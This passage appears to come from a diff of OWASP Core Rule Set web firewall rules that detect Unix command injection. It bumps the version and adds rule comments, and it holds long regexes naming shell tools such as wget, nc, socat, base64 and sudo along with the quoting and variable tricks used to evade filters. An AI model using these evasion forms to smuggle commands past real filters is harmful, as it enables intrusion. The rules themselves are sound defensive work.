(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:g|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))[\s\x0b&\),<>\|].*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*))" \ "id:932250,\ phase:2,\ block,\ @@ -508,7 +514,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -526,6 +532,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -551,7 +559,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932260 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible|pparmor_[^\s\x0b]{1,10}\b|rj(?:-register|disp)|tobm(?:[\s\x0b&\),<>\|]|$)|u(?:ditctl|repot|search))|b(?:ase(?:32|64|nc)|(?:lkid|rwap|yobu)(?:[\s\x0b&\),<>\|]|$)|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more))|c(?:[89]9-gcc|h(?:(?:attr|mod|o(?:om|wn)|sh)(?:[\s\x0b&\),<>\|]|$)|ef-|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$))|pass)|lang\+\+|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|mm(?:[\s\x0b&\),<>\|]|$)|proc)|(?:p(?:an|io)|scli)(?:[\s\x0b&\),<>\|]|$))|d(?:(?:iff|mesg|vips)(?:[\s\x0b&\),<>\|]|$)|o(?:as(?:[\s\x0b&\),<>\|]|$)|cker-)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:2fsck|(?:fax|grep|macs|nd(?:if|sw)|sac|xpr)(?:[\s\x0b&\),<>\|]|$))|f(?:d(?:(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|grep(?:[\s\x0b&\),<>\|]|$)|iletest|ping(?:[\s\x0b&\),6<>\|]|$)|tp(?:stats|who))|g(?:(?:core|insh|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|(?:etca|unzi)p|hc(?:-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:(?:cat|ep)(?:[\s\x0b&\),<>\|]|$)|oupmod))|(?:htop|jexec)(?:[\s\x0b&\),<>\|]|$)|i(?:(?:conv|ftop)(?:[\s\x0b&\),<>\|]|$)|pp(?:eveprinter|find|tool))|l(?:ast(?:comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|osetup|s(?:(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|wp-download|z(?:4c(?:[\s\x0b&\),<>\|]|$|at)|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore)))|m(?:a(?:(?:ilq|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|k(?:fifo|nod(?:[\s\x0b&\),<>\|]|$)|temp)|locate|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:sm|wk)|(?:ma|ohu)p|ping|roff|stat)(?:[\s\x0b&\),<>\|]|$)|c(?:\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|et(?:(?:c|st)at|kit-ftp|plan))|o(?:nintr|pkg(?:[\s\x0b&\),<>\|]|$))|p(?:d(?:b(?:2mb|3(?:[\s\x0b&\),\.<>\|]|$))|ksh(?:[\s\x0b&\),<>\|]|$))|(?:er(?:f|l5?)|(?:ft|gre)p|i(?:gz|ng6)|(?:op|ush)d|s(?:ed|ql))(?:[\s\x0b&\),<>\|]|$)|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|k(?:exec|ill(?:[\s\x0b&\),<>\|]|$))|rint(?:env|f(?:[\s\x0b&\),<>\|]|$))|tar(?:[\s\x0b&\),<>\|]|$|diff|grep)|wd\.db|y(?:3?versions|thon[23]))|r(?:(?:aku|bash|nano|pmdb|unc|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|e(?:alpath|boot(?:[\s\x0b&\),<>\|]|$))|m(?:dir(?:[\s\x0b&\),<>\|]|$)|t-(?:dump|tar)|user)|sync(?:-ssl|[\s\x0b&\),<>\|]|$))|s(?:(?:diff|ftp|lsh|ocat)(?:[\s\x0b&\),<>\|]|$)|e(?:ndmail(?:[\s\x0b&\),<>\|]|$)|t(?:cap|env|sid))|h(?:\.distrib|uf(?:[\s\x0b&\),<>\|]|$))|pwd\.db|sh-(?:a(?:dd|gent)|copy-id)|td(?:err|in(?:[\s\x0b&\),<>\|]|$)|out)|udo(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ysctl)|t(?:(?:ailf|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:l?sh(?:[\s\x0b&\),<>\|]|$)|p(?:ing|traceroute))|elnet|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$)))|u(?:n(?:(?:iq|rar|xz)(?:[\s\x0b&\),<>\|]|$)|lz(?:4(?:[\s\x0b&\),<>\|]|$)|ma)|pigz|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|w(?:get(?:[\s\x0b&\),<>\|]|$)|hoami)|x(?:(?:args|etex|more|pad|term)(?:[\s\x0b&\),<>\|]|$)|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more))|z(?:(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|std(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less)))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 